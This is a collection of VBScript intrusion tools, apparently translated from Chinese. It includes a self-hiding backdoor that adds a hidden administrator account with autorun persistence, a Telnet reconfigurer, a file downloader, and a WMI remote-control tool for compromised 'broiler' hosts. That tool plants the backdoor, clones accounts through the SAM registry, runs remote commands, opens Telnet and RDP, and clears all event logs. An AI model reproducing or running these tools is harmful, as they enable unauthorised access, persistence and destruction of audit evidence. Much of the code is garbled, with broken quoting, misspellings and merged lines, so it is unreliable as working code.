Door.vbs
'**************
'door.vbs by black 嘿 black
'**************
DIM WSH, FA, FSO
SET FSO = CreateObject ("scripting.filesystemObject")
Set fa = fso.getfile (wscript.scriptfullname)
Fa.attributes = 34
SET WSH = CreateObject ("wscript.shell")
Wsh.Run "Net User iuse_server xyhack.91i.net / add", 0, true
Wsh.run "Net localgroup administrators iuse_server / add", 0, true
Wsh.Regwrite "HKLM / Software / Microsoft / Windows / CurrentVersion / Run / Win32", "& Fa &"
Wsh.Regwrite
"HKLM / Software / Microsoft / Windows / Currentversion / Explorer / Advanced / Folder / Hidden / Showall / CheckedValue", 0, "Reg_dword"
Wsh.Regwrite "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Command Processor / Autorun", "& Fa &" "
Wsh.Regwrite "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Command Processor / Autorun", "& Fa &" "
Function: Add a dead account (start with CMD), completely hide under Win.
Use: Run directly.
2. NTLM.VBS
'**************
'ntlm.vbs by black 嘿 black
'**************
DIM WSH
SET WSH = CreateObject ("wscript.shell")
Wsh.Regwrite "HKLM / Software / Microsoft / Telnet Server.0 / NTLM", WScript.Arguments (0), "REG_DWORD"
Wsh.Regwrite "HKLM / Software / Microsoft / TelnetServer.0 / Telnetport", WScript.Arguments (1), "Reg_dword"
Function: Customize the NTML and port of Telnet.
Use: d: /> ntml.vbs 1 999
3. Iget.vbs
'****************************
'Iget.vbs mod by black 嘿 black
'****************************
Set Xpost = CreateObject ("Microsoft.xmlhttp")
XPOST.OPEN "get", LCase (wscript.arguments (0)), 0
Xpost.send ()
Set sget = creteObject ("adodb.stream")
sget.mode = 3
sget.type = 1sget.open ()
sget.write (xpost.responsebody)
sget.savetofile lcase (wscript.arguments (1)), 2
Function: The http file is downloaded from the command line.
Use: d: /> igt.vbs http://xyhack.91i.net/vbs.rar vbs.rar
4. rcmd.vbs
'**************
'rcmd.vbs by black 嘿 black
'**************
ON Error ResMe next
Set outstreem = wscript.stdout
Set instreem = wscript.stdin
IF (Lcase (Right (Wscript.Fullname, 11)) = "wscript.exe") THEN
Set objshell = wscript.createObject ("wscript.shell")
Objshell.Run ("cmd.exe / k cscript // nologo" & chr (34) & wscript.scriptfullname & chr (34))
END IF
IF wscript.Arguments.count <3 THEN
USAGE ()
WScript.echo "Not Enough Parameters."
WScript.quit
END IF
ipaddress = wscript.arguments (0)
Username = wscript.arguments (1)
Password = wscript.arguments (2)
USAGE ()
OutStreem.write "Conneting" & ipaddress & "..."
Set objlocator = creteObject ("wbemscripting.swbemlocator") '20
Set objswbemservices = objlocator.connectServer (iPaddress, "Root / Cimv2", UserName, Password)
Objswbemservices.security_.privileges.add 23, True
Objswbemservices.security_.privileges.add 18, True
Objswbemservices.security_.privileges.add 7, True
Objswbemservices.security_.privileges.add 11, True
IF ErrorNumber <> 0 THEN
WScript.echo "Error!"
Call main ()
Else
WScript.echo "OK!"
END IF
Call main ()
'********************************************************** **********
Function door ()
OutStreem.write "CREATING The Blankdoor .."
Set objinstproc = objswbemservices.get ("Win32_Process")
cmddoor = "cmd / c echo dim WSH, FA, FSO, T>% windir% / system32 / svrer.vbs" _
& "&& echo set fso = createObject (" Scripting.FilesystemObject "") >>% windir% / system32 / svre.vbs "_ &" && echo set fa = fso.getfile (wscript.scriptfullname) >>% windir% / System32 / svracter.vbs "_
& "&& echo fa.attributes = 34 >>% windir% / system32 / svrer.vbs" _
& "&& echo set t = fso.createtextfile (" "% windir% / system32 / system.bat" ", true) >>% windir% / system32 / svrer.vbs" _
& "&& echo t.writeline" ("Net user iuse_server xyhack.91i.net /add""">>%Windir%/system32/svre.vbs"
& "&& echo t.writeline (" Net localgroup administrators iuse_server /add"")>>%%Windir%/system32/svre.vbs "_
& "&& echo t.writeline (" "Attrib H% WINDIR% / System32 / System.bat" ") >>% windir% / system32 / svrer.vbs"
& "&& echo t.close >>% windir% / system32 / svrer.vbs" _
& "&& echo set wsh = creteObject (" Wscript.shell ") >>% windir% / system32 / svrer.vbs" _
& "&& echo wsh.run" "Net user iuse_server xyhack.91i.net /add"" ,0, path "%Windir%/system32/svrer.vbs"
& "&& echo wsh.run" "Net localgroup administrators iuse_server / add" ", 0, true >>% windir% / system32 / svre.vbs" _
& "&& echo wsh.regwrite
"HKLM / Software / Microsoft / WINDOWS / CURRENTVERSION / RUN / WIN / WIN / WIN32" "" ""% WINDIR% / SYSTEM32 / SVRER.VBS ">>% WINDIR% / system32 / svrer.vbs" _
& "&& echo wsh.regwrite
"HKLM / Software / Microsoft / Windows / Currentversion / Explorer / Advanced / Folder / Hidden / Showall / CheckedValue" ", 0," Reg_dword ">>% windir% / system32 / svrer.vbs" _
& "&& echo wsh.regwrite" "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Command
Processor / autorun "", "% windir% / system32 / svrer.vbs" >>% windir% / system32 / svrer.vbs "_
& "&& echo wsh.regwrite" "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Command
Processor / autorun "", "% windir% / system32 / svrer.vbs" >>% windir% / system32 / svrer.vbs "_
& "&& echo wsh.run" "CMD / C AT 20: 00, 20: 10, 20: 20, 20: 30% WINDIR% / System32 / System.bat" ", 0, TRUE
>>% windir% / system32 / svrer.vbs "
Objinstproc.create (cmddoor)
Showerror (Err.Number)
WScript.sleep (1500)
OutStreem.write "Runing the blankdoor .."
Objinstproc.create ("CMD / C CScript% Windir% / System32 / SVRER.VBS")
Showerror (Err.Number)
Call main ()
END FUNCTION
'********************************************************** **********
Function CA ()
WScript.echo "Enter the causername:"
Causername = wscript.stdin.readline ()
Wscript.echo "Enter the Capassword:"
Capassword = wscript.stdin.readline ()
OutStreem.write "getting sid of" & causername & "..."
Set colinstsid = objswbemservices.execQuery ("SELECT * WIN32_USERACCOUNT WHERE Name =" & Chr (34) & Causername & Chr (34))
For Each Objinstsid in Colinstsid
strsid = Objinstsid.sID
SIDFLAG = Right (strsid, len (strsid) -instrrev (strsid, "-")))
Strflag = CSTR (HEX (Sidflag))
RegName = String (8-Len (strflag), "0") & strflag
NEXT
If strsid = "" "& vbcrlf &" username is not exist. "
Call main ()
Else
WScript.echo "OK!"
END IF
OutStreem.write "prepairing .."
Set objinstproc = objswbemservices.get ("Win32_Process")
Showerroronly (Err.Number)
CMDLINE = "cmd / c echo set oreg = getObject (" Winmgmts: root / default: stdregprov ")>% temp% / ca.vbs" _
& "&& echo oreg.getbinaryValue ^ & H80000002," Sam / Sam / Domains / Account / Users0001F4 "", "F" ", UValue >>% TEMP% / CA.VBS" _
& "&& echo oreg.setbinaryValue ^ & H8000000002," SAM / SAM / DOMAINS / Account / Users / "? Name &" "" "F" ", UVALUE >>% TEMP% / CA.VBS" _
& "&& echo set sh = creteObject (" Wscript.shell ") >>% temp% / ca.vbs"
& "HKLM / Software / Microsoft / Windows Script Host / Settings / Caflag" "," 1 ">>% Temp% / CA.vbs"
Objinstproc.create (cmdline)
Showerroronly (Err.Number)
cmdline = "cmd / c echo atime = TIME>% temp% / getsys.vbs" _
& "&& echo set sh = creteObject (" Wscript.shell ") >>% temp% / getsys.vbs"
& "&& echo sh.run" "CMD / C at 23:59 CScript% Temp% / CA.VBS" "", 0, True >>% TEMP% / Getsys.vbs "_
& "&& echo sh.run" "CMD / C TIME 23: 58: 59.90" ", 0, True >>% TEMP% / Getsys.vbs" _
& "&& echo wscript.sleep (1100) >>% TEMP% / getsys.vbs" _
& "&& echo sh.run" CMD / C Time "" ^ & Atime, 0, True >>% TEMP% / Getsys.vbs "Objinstproc.create (cmdline)
Showerror (Err.Number)
OutStreem.write "processing."
Set colinstsvr = objswbemservices.execQuery ("SELECT * WIN32_SERVICE WHERE Name = 'Schedule')
Showerroronly (Err.Number)
For Each Objinstsvr in Colinstsvr
Flag1 = 0
Flag2 = 0
IF objinstsvr.startmode = "disabled" then
Objinstsvr.changeStartMode ("manual")
Flag1 = 1
END IF
IF Objinstsvr.Started = FLASE THEN
Errnumber = Objinstsvr.StartService ()
Flag2 = 1
END IF
Showerroronly (Err.Number)
Objinstproc.create ("CMD / C CScript% Temp% / Getsys.vbs")
Showerroronly (Err.Number)
Set objinstreg = objlocator.connectServer (iPaddress, "root / default", username, password) .get ("stdregprov")
For i = 1 to 20
Objinstreg.getstringValue & H80000002, "Software / Microsoft / Windows Script Host / Settings", "Caflag", Svalue
If svalue = "1" THEN
EXIT for
Else
WScript.sleep (500)
END IF
NEXT
Objinstproc.create ("Net User" & Causername & "& Capassword)
If Flag1 Then Objinstsvr.changeStartMode ("Disabled")
IF flag2 Then Objinstsvr.stopservice ()
NEXT
IF Svalue <> "1" THEN
WScript.echo "Error." & vbcrlf & "Waiting Time Out."
Else
Showerror (Err.Number)
END IF
OutStreem.write "clean up .."
Objinstproc.create ("CMD / C DEL% TEMP% / CA.VBS")
Showerroronly (Err.Number)
Objinstproc.create ("CMD / C DEL% TEMP% / Getsys.vbs")
Showerroronly (Err.Number)
if Svalue = "1" Then Objinstreg.deletevalue & H80000002, "Software / Microsoft / Windows Script Host / Settings", "Caflag" Showerror (Err.Number)
Call main ()
END FUNCTION
Function showerroronly (ERRORNUMBER)
IF errornumber dam
Wscript.echo "Error 0X" & CSTR (HEX (Err.Number) & "."
IF Err.Description <> "" "" "
WScript.echo "Error Description:" & Err.Description & "."
END IF
Call main ()
Else
Outstreem.write "."
END IF
END FUNCTION
'********************************************************** **********
Function Share ()
WScript.echo String (18, "-")
Wscript.echo "0. Return to cmd> ="
WScript.echo "1. List the sharing information: ="
WScript.echo "2. Create shared ="
Wscript.echo "3. Delete shared ="
WScript.echo String (18, "-")
Wscript.echo "please chose the parameter:"
Parameters = wscript.stdin.readline ()
SELECT CASE Parameters
Case "quit", "0"
Main ()
Case "List", "1"
Listshare ()
Case "Open", "2" '40
Openshare ()
Case "Close", "3"
CloseShare ()
End SELECT
END FUNCTION
Function Listshare ()
OutStreem.write "Listing The Netshare from" & ipaddress & "...."
SET colshares = objswbemservices.execQuery ("SELECT * from Win32_Share")
Showerror (Err.Number) '50
WScript.echo _
("CAPTION" & Chr (9) & chr (9) & "name:" & chr (9) & chr (9) & "pat")
For Each Objshare in colshares
WScript.echo _
(Objshare.caption & chr (9) & objshare.name & chr (9) & chr (9) & objshare.path)
NEXT
Wscript.echo vbcrlf & "All Share Have Been Listed SuccessFully!"
Call share () end function
Function OpenShare ()
Wscript.echo "Enter the path:" 70
Path = wscript.stdin.readline ()
Wscript.echo "Enter the name:"
SNAME = wscript.stdin.readline ()
Const file_share = 0
Const Maximum_Connections = 25
Set objnewshare = objswbemservices.get ("Win32_share")
ErrreTurn = Objnewshare.create_
(Path, Sname, File_Share, _
Maximum_Connections, "Default Sharing")
Wscript.echo "The Share Have Been Ceated Success FuL"
Call share ()
END FUNCTION
Function clos Hare ()
Wscript.echo "Plese Enter the name:"
KName = wscript.stdin.readline ()
Outstreem.write "killing the" & kname & "..."
SET colshares = objswbemservices.execQuery_
("Select * from win32_share where name =" & "" & kname & "'")
For Each Objshare in colshares
Objshare.delete
NEXT
Showerror (Err.Number)
Call share ()
END FUNCTION
'********************************************************** **********
Function Listsvr ()
OutStreem.write "Listing The Service from" & ipaddress & "..."
Set collistofservices = objswbemservices.execQuery_
("Select * from win32_service")
Showerror (Err.Number)
WScript.echo _
("Name" & chr (9) & chr (9) & "State" & chr (9) & chr (9) & "mode" & chr (9) & "path name")
For Each ObjService in CollistofServices
IF LEN (ObjService.Name <8 THEN
Strname = ObjService.Name & Chr (9)
Else
Strname = ObjService.name
END IF
WScript.echo _
(Strname & Chr (9) & objService.State & Chr (9) & chr (9) & objService.Startmode & Chr (9) & objService.pathname)
NEXT
WScript.echo Vbcrf & "All Services Have Been Listed SuccessFully!" Call main ()
END FUNCTION
'********************************************************** ***********
Function reboot ()
OutStreem.write "now, restarting target ...."
StrwqlQuery = "SELECT * WIN32_OPERATINGSYSTEM Where primary = 'true'"
Set colinstances = objswbemservices.execQuery (strwqlQuery)
For Each Objinstance in Colinstances
Objinstance.win32shutdown (6)
NEXT
Showerror (Err.Number)
Call main ()
END FUNCTION
'********************************************************** ************
Function INF ()
Outstreem.write "getting infomation from" & ipaddress & "..."
Set obj1 = objget ("win32_computersystem")
Showerror (Err.Number)
Wscript.echo "" & vbcrlf
Set obj2 = Objget ("Win32_Operatingsystem")
Set col3 = objswbemservices.instancesof ("Win32_Processor")
Set obj4 = objget ("Win32_LogicalMemoryConfiguration")
Set obj5 = Objget ("Win32_BIOS")
Set obj6 = Objget ("Win32_DisplayConfiguration")
Set col7 = objswbemservices.instancesof ("win32_diskdrive")
Set col8 = objswbemservices.instancesof ("Win32_LogicalDisk")
Set col9 = objswbemservices.instancesof ("Win32_NetworkAdapterConfiguration")
Set col10 = objswbemservices.instancesof ("win32_quickfixenngineering")
WNL "OS INFO:"
WNL "Computer Name:" & obj1.name
WNL "User Name:" & obj1.username
WNL "Domain:" & obj1.domain
Domainrole = ""
Select Case Obj1.domainRole
Case 0
Domainrole = "Workstation"
Case 1
Domainrole = "Member Workstation"
Case 2
DomainRole = "Server" case 3
DomainRole = "Member Server"
Case 4
Domainrole = "Backup Domain Controller"
Case 5
Domainrole = "Main Domain Controller"
End SELECT
With obj2
WNL "Domain Role:" & DomainRole
WNL "CAPTION:" & .caption
WNL "Organization:" & .organization
WNL "Registered User:" & .registereduser
WNL "Install Date:" & TimeFormat (.installDate)
WNL "Last Bootup Time:" & TimeFormat (.lastbootuptime)
WNL "Windows Directory:" & .windowsDirectory
WNL "System Directory:" & .systemDirectory
WNL "Boot Device:" & .bootdevice
WNL "Country Code:" & .countrycode
Wnl "CSName:" & .csname
WNL "Description:" & .description
WNL "Manufacturer:" & .manufacturer
WNL "Serial Number:" & .serialnumber
WNL "Version:" & .version
WNL "System Type:" & obj1.systemtype
WNL "System Startup Delay:" & obj1.systemStartUpdelay & "S"
Wnl "System Startup Options:" & obj1.systemStartupOptions (0)
For i = 1 to Ubound (Obj1.systemStartupOptions)
WNL Space (28) & obj1.systemStartupOptions (i)
NEXT
End with
WNL VBCRLF & "Processor Info:"
Wnl "Number of Processors:" & obj1.numberofprocessors
For Each Obj3 in col3
With Obj3
WNL "Device ID:" & .DeviceID
Wnl "name:" & .name
Wnl "Current Clock Speed:" & .CurrentClockSpeed & "MHz"
WNL "Description:" & .description
WNL "Ext Clock:" & .extClock & "MHz"
WNL "L2 Cache Size:" & .l2cachesize & "KB" WNL "L2 Cache Speed:" & .l2cachespeed & "MHz"
WNL "Processor ID:" & .processorid
WNL "Manufacturer:" & .manufacturer
WNL "Socket Designation:" & .socketDesignation
WNL "Address Width:" & .addresswidth & "Bit"
WNL "Data Width:" & .dataWidth & "Bit"
End with
NEXT
WITH OBJ4
WNL VBCRLF & "Memory Info:"
WNL "Total Physical Memory:" & CINT (.totalphysicalMemory / 1024) & "MB"
WNL "free Physical Memory:" & CINT (Obj2.freePhysicalMemory / 1024) & "MB"
WNL "Total Pagefile Space:" & CINT (.totalpageFilespace / 1024) & "MB"
WNL "Total Virtual Memory:" & CINT (.totalvirtualMemory / 1024) & "MB"
WNL "Available Virtual Memory:" & CINT (.availableVirtualMemory / 1024) & "MB"
End with
WNL VBCRLF & "BIOS INFO:"
WNL "Description:" & obj5.description
WNL "Current Language:" & obj5.currentlanguage
WNL "Version:" & obj5.version
WNL "Manufacturer:" & obj5.manufacturer
With obj6
WNL VBCRLF & "Display Configuration:"
WNL "CAPTION:" & .caption
WNL "Device Name:" & .DeviceName "
WNL "Driver Version:" & .driverVersion
WNL "Display Frequency:" & .displayFrequency & "HZ"
WNL "BITS Per Pel:" & .bitsperpel & "Bit"
Wnl "PELS:" & .pelswidth & "x" & .pelsheight
End with
WNL VBCRLF & "Disk Info:"
For Each Obj7 in col7
WITH OBJ7
WNL "DeviceID:" & .Deviceidwnl "CAPTION:" & .caption
WNL "Interface Type:" & .InterfaceType "
WNL "SCSI bus:" & .scsibus
WNL "SCSI Logical Unit:" & .scsilogicalUnit
WNL "SCSI Port:" & .scsiPort
WNL "SCSI TargetID:" & .scsiTargetID
Wnl "Sectors Per TRACK:" & .sectorspertrack & "kB"
WNL "Partitions:" & .Partitions
WNL "Size:" & sizeFormat (.size)
End with
NEXT
Str = "Volume" Space (2) "Type" Space (8) "Format" Space (4)
Str = STR "SIZE" Space (6) "Free" Space (12) "label"
WNL STR
For Each Obj8 in COL8
With obj8
DriveType = "" "
SELECT CASE.DRIVETYPE
Case 0
DriveType = "unknow"
Case 1
DriveType = "Norootdir"
Case 2
DriveType = "removeable"
Case 3
DriveType = "fixed"
Case 4
DriveType = "network"
Case 5
DriveType = "CD-ROM"
Case 6
DriveType = "RAM"
End SELECT
Strpercent = ""
if .size <> "" and .freespace <> "" ""
Strpercent = "(" & FormatperCent (.freespace / .size, 0) ""
END IF
Str = "" & WSP (.caption, 8) & WSP (DRIVETYPE, 12) & WSP (.FileSystem, 10) & WSP (SizeFormat (.size), 10)
Str = Str & WSP (SizeFormat (.Freespace) & strpercent, 16) &. Volumename
WNL STR
End with
NEXT
WNL VBCRLF & "NIC Informaton:"
For Each Obj9 in col9
With Obj9
if.ipenabled then
WNL "INDEX:" & .index
WNL "Description:" & .description
WNL "DHCP Enabled:" & .dhcPENABLED
Wnl "DHCP Server:" & .dhcpserverwnl "DNS Host Name:" & .dnshostname
WNL "DNS Server Search Order:" & WFL (.dnsserversearchOrder)
WNL "WINS Primary Server:" & .winsprimaryServer
WNL "IP Address:" & WFL (.ipaddress)
WNL "Mac Address:" & .macaddress
WNL "Default IP Gateway:" & wfl (.defaultiPgateway)
WNL "IP Subnet:" & WFL (.ipsubnet)
WNL "IP Filter Security Enabled:" & .IpfiltersecurityEnable
WNL "IPsec Permit IP Protocols:" & WFL (.ipsecPermitipprotocols)
WNL "IPsec Permit TCP Ports:" & WFL (.ipsecPermittcpports)
WNL "IPsec Permit UDP Ports:" & WFL (.ipsecPermitudpports)
END IF
End with
NEXT
WNL VBCRLF & "Hot Fixes INFO:"
For Each Obj10 in col10
WNL "Hot Fix ID:" & obj10.hotfixid
WNL "FIX Comments:" & obj10.fiXcomments
WNL "Install Date:" & obj10.installdate
WNL "Service Pack in Effect:" & obj10.servicePackineffect
NEXT
WNL VBCRLF & "Applications:"
Set objswb1 = objlocator.connectServer (iPaddress, "root / default", username, password)
Set Obj11 = objswb1.get ("stdregprov")
HKLM = & h80000002
Keypath = "Software / Microsoft / Windows / CurrentVersion / Uninstall /"
Obj11.enumkey HKLM, Keypath, KeyArray
Redim Str (Ubound (KeyArray) 1)
J = 0
For i = 0 to Ubound (keyArray)
Obj11.getstringValue HKLM, Keypath Keyarray (i), "DisplayName", Strvalue
IF strval <> "" ""
Str (j) = Strvalue
J = J 1
END IF
NEXT
IF J> 1 THEN
For i = 0 to j-1
Fork = 0 to j-i-1
IF STRComp (STR (K), STR (K 1), 1) = 1 THEN
Strtemp = STR (k 1) STR (k 1) = STR (k)
STR (k) = strTemp
END IF
NEXT
NEXT
END IF
For i = 0 to j-1
WNL "& STR (i)
NEXT
Wscript.echo "" & vbcrlf
WScript.echo "The Infomation from & ipaddress & Had Been Listed SuccessFully!"
Call main ()
END FUNCTION
SUB WNL (MSG)
WScript.echo MSG
IF isobject (of).
ON Error ResMe next
Of.writeLine MSG
Showerror ()
ON Error Goto 0
END IF
End Sub
Function WFL (Byref Obj)
Str = "" "
For i = 0 to Ubound (obj)
Str = Str & Obj (i) & ""
NEXT
WFL = STR
END FUNCTION
Function WSP (MSG, NUM)
IF MSG <> "" "
MSG = Left (MSG, NUM-1)
WSP = MSG & Space (Num-Len (MSG))
Else
WSP = space (NUM)
END IF
END FUNCTION
Function TimeFormat (MSG)
TimeFormat = Left (MSG, 4) & "/" & MID (MSG, 5, 2) & "& MID (MSG, 7, 2) &" & MID (MSG, 9, 2) & ":" & MID (MSG 11, 2) & ":" & MID (MSG, 13, 2)
END FUNCTION
Function SizeFormat (MSG)
IF MSG <> "" "
Size = msg / 1048576
IF size> 1024 THEN
SizeFormat = Round (Size / 1024, 2) & "GB"
Else
SizeFormat = Round (Size, 1) & "MB"
END IF
END IF
END FUNCTION
Function Objget (MSG)
Set col = objswbemservices.instancesof (msg)
For Each Objx in col
Set obj = Objx
NEXT
Set objget = OBJ
END FUNCTION
'************************************************
Function command ()
Wscript.echo "Plese Enter the Command:"
Call Run ()
END FUNCTION
Function Run ()
Strcmdline = wscript.stdin.readline ()
if strcmdline = "exit" or strcmdline = "quit" or strcmdline = "0" THEN
Call main ()
END IF
OutStreem.write "Running The Command ...." set objinstance = objswbemservices.get ("win32_process")
Set objmethod = Objinstance.Methods _ ("create")
Set objinparam = objmethod.inparameters.spawninstance_ ()
Objinparam.commandline = STRCMDLINE
Set objoutparam = Objinstance.execmethod _ ("create", objinparam)
IF Objoutparam.ReturnValue <> 0 THEN
WScript.echo "Error!"
Call command ()
Else
WScript.echo "OK!"
END IF
Wscript.echo "The process id is" & objoutparam.processid
Wscript.echo "Runing Command:" & strcmdline & ". to" & ipaddress & "surcessful" & vbcrlf
Call command ()
END FUNCTION
'*************************************************
Function PSList ()
OutStreem.write "Listing Process ...."
Set colinstances = objswbemservices.execQuery ("SELECT * from Win32_Process")
Showerror (Err.Number)
WScript.echo Vbcrlf & "Name" & Chr (9) & chr (9) & "PID" & chr (9) & "ExecutablePath"
For Each Objinstance in Colinstances
IF len (objinstance.name) <8 THEN
Strname = objinstance.name & chr (9)
Else
Strname = Objinstance.name
END IF
Wscript.echo strname & chr (9) & objinstance.handle & chr (9) & objinstance.executablePath
NEXT
WScript.echo Vbcrf & "All Process Have Been Listed SuccessFully!"
Call main ()
END FUNCTION
'************************************************
Function pskill ()
Wscript.echo "Plese Enter The Process's ID:"
Striprocess = wscript.stdin.readline ()
OutStreem.write "killing id =" & strprocess & "process ...."
Set objinstance = objswbemservices.get ("win32_process.handle =") ing varInstance <> vbobject then
WScript.echo Vbcrf & "Specified Process is not exist."
Call main ()
Else
Set objmethod = Objinstance.Methods _ ("terminate")
Set objinparam = objmethod.inparameters.spawninstance_ ()
Objinparam.reason = 0
Set objoutparam = Objinstance.execmethod_ ("Terminate", Objinparam)
ShowError (Objoutparam.ReturnValue)
Wscript.echo "The process's id =" & strprocess & "have been killed successful"
END IF
Call main ()
END FUNCTION
'********************************************************** *******
Function Telnet ()
OutStreem.write "Querying State of Telnet Server ...."
Set objswbemservices = objlocator.connectServer (iPaddress, "Root / Cimv2", UserName, Password)
Set colinstances = objswbemservices.execQuery ("SELECT * WIN32_SERVICE WHERE NAME = 'TLNTSVR')
Showerror (Err.Number)
For Each Objinstance in Colinstances
If Objinstance.StartMode = "disabled" then
OutStreem.write "Telnet Server Has Been Disabled. Now change start mode to manual ...."
Set objmethod = objinstance.methods _ ("changestartMode")
Set objinparam = objmethod.inparameters.spawninstance_ ()
Objinparam.StartMode = "manual"
Set objoutparam = Objinstance.execmethod _ ("ChangeStartMode", Objinparam)
ShowError (Objoutparam.ReturnValue)
END IF
OutStreem.write "changeing state ...."
IF objinstance.started = True Then
IntStatus = Objinstance.stopservice ()
ShowError (intstatus)
Wscript.echo "Target Telnet Server Has Been Stop SuccessFully." ELSE
ShowError (intstatus)
Wscript.echo "Plese Enter the NTLM:"
NTLM = wscript.stdin.readline ()
Wscript.echo "Plese Enter the port:"
Port = wscript.stdin.readline ()
IF not isnumeric (ntlm) or ntlm <0 or ntlm> 2 THEN
Wscript.echo "The Value of NTML IS WRONG."
Call main ()
END IF
IF not isnumeric (port) THEN
Wscript.echo "The value of port is wrong."
Main ()
END IF
Set objswbemservices1 = objlocator.connectServer (iPaddress, "root / default", username, password)
OutStreem.write "setting ntlm =" & ntlm & "...."
Set objinstance1 = objswbemservices1.get ("stdregprov")
Set objmethod = objinstance1.methods _ ("setdwordValue")
Set objinparam = objmethod.inparameters.spawninstance_ ()
Objinparam.hdefkey = & h80000002
Objinparam.ssubkeyName = "Software / Microsoft / Telnet Server.0"
Objinparam.svaluename = "ntlm"
Objinparam.uValue = NTLM
Set objoutparam = objinstance1.execmethod _ ("setdwordValue", objinparam)
ShowError (Objoutparam.ReturnValue)
OutStreem.write "setting port =" & port & "...."
Objinparam.svaluename = "telnetport"
Objinparam.UValue = port
Set objoutparam = objinstance1.execmethod _ ("setdwordValue", objinparam)
ShowError (Objoutparam.ReturnValue)
IntStatus = Objinstance.StartService ()
WScript.echo "Target Telnet Server Has Been Start SuccessFully!"
WScript.echo "Now, You CAN TRY: Telnet" & Ipaddress & "& Port &" To Get A Shell. "
END IF
NEXT
Call main ()
END FUNCTION
'********************************************************** ******* Function RS ()
Outstreem.write "Checking the OS Type ...."
Set colinstoscaption = objswbemservices.execQuery ("Select Caption from Win32_Operatingsystem")
For Each Objinstoscaption in Colinstoscaption
IF INSTR (Objinstoscaption.caption, "Server")> 0 THEN
WScript.echo "OK!"
Else
WScript.echo "OK!"
WScript.echo "OS Type IS" & Objinstoscaption.caption
Wscript.echo "You Cann't Open Terminal Services, Canceling ...." & chr (13) '60
Call main ()
END IF
NEXT
Wscript.echo "Plese Enter the port:"
Port = wscript.stdin.readline ()
IF not isnumeric (port) or port <1 or port> 65000 Then '50
Wscript.echo "The Number of Port is Error."
Call main ()
END IF
OutStreem.write "Writing Into Registry ...."
Set objinstreg = objlocator.connectServer (iPaddress, "root / default", username, password) .get ("stdregprov")
HKLM = & h80000002
With objinstreg
.createKey, "Software / Microsoft / Windows / CurrentVersion / Netcache"
.SetdWordValue HKLM, "Software / Microsoft / Windows / Currentversion / Netcache", "Enabled", 0 '770
.createKey HKLM, "Software / Policies / Microsoft / Windows / Installer"
.SetdWordValue HKLM, "Software / Policies / Microsoft / Windows / Installer", "EnableadmintsRemote", 1
.SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server", "Tsenabled", 1
.SetdWordValue HKLM, "System / CurrentControlset / Services / Termdd", "START", 2
.SetdWordValue HKLM, "System / CurrentControlset / Services / Termservice", "START", 2
.SetstringValue HKLM, ". Default / Keyboard Layout / Toggle", "Hotkey", "1" .SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server / WinStations / RDP-TCP", "Portnumber", Port
End with
Showerror (Err.Number)
Wscript.echo "Now, you need to reboot target!"
WScript.echo "Do you want to reboot target now? [y / n]"
Strcancel = wscript.stdin.readline ()
if strcancel = "n" then
Wscript.echo "you need to reboot target kiln !!"
Call main ()
Else
Call reboot ()
END IF
Wscript.echo "You Can Logon Terminal Services On" & Port & "Later, Good Luck!"
Call main ()
END FUNCTION
'********************************************************** ************
Function clog ()
OutStreem.write "clearing all logs ...."
StrwqlQuery = "SELECT * WIN32_NTEVENTLOGFILE"
Set colinstances = objswbemservices.execQuery (StrwqlQuery, "WQL", & H20)
For Each Objinstance in Colinstances
IF objinstance.cleareventlog () <> 0 THEN
WScript.echo "Error!" '100
Call main ()
END IF
NEXT
WScript.echo "OK!"
WScript.echo "All logs have been clear successful" "
Call main ()
END FUNCTION
'********************************************************** *************
Function showerror (ERRORNUMBER)
IF errornumber dam
Wscript.echo "Error 0X" & CSTR (HEX (Err.Number) & "."
IF Err.Description <> "" "" "
WScript.echo "Error Description:" & Err.Description & "."
END IF
Call main ()
Else
WScript.echo "OK!"
END IF
END FUNCTION
'********************************************************** *****************
Function usage ()
WScript.echo String (79, "*") WScript.echo "RCMD V1.05"
WScript.echo "Remote Execution Script, By Black"
Wscript.echo "Welcome to Visite www.xyhack.91i.net"
WScript.echo "QQ: 123230273 E-mail: cnhacker521@hotmail.com"
Wscript.echo "Usage:"
Wscript.echo "CScript" & wscript.scriptfullname & "targetip username password"
Wscript.echo "Ten Chose the Command>"
WScript.echo String (79, "*")
END FUNCTION
'********************************************************** **********
Function main ()
WScript.echo ""
Wscript.echo "now chose the commit>"
WScript.echo "0.quit exits script"
Wscript.echo "1.telnet remote / off Telnet"
WScript.echo "2.3389 remote open 3389"
Wscript.echo "3.clog Remote Delete All Logs"
WScript.echo "4.Getf Gets the broiler system information"
WScript.echo "5.pslist Example Process"
WScript.echo "6.pskill Delete Process"
Wscript.echo "7.commad remote execution dos command"
Wscript.echo "8.reboot Remote Restart broiler"
Wscript.echo "9.slist Examples from the service information on remote broiler"
Wscript.echo "a.share 1. List sharing 2. Create a shared 3. Delete Sharing"
WScript.echo "B.ca Clone Account"
Wscript.echo "C. Door planting the door"
WScript.echo String (79, "*")
WScript.echo "CMD>"
CMD = wscript.stdin.readline ()
WScript.echo ""
SELECT CASE CMD
Case "telnet", "1"
Telnet ()
Case "3389", "2"
RS ()
Case "clog", "3"
CLOG ()
Case "getf", "4"
INF ()
Case "PSL", "PSLIST", "5"
PSList ()
Case "PSK", "Pskill", "6"
pskill ()
Case "CMD", "Command", "7"
Command ()
Case "Reboot", "8"
Reboot ()
Case "SLIST", "9" List Listsvr ()
Case "Share", "10", "A", "a"
Share ()
Case "B", "B", "11"
CA ()
Case "C", "C", "12"
Door ()
Case "quit", "0"
WScript.quit
End SELECT
END FUNCTION
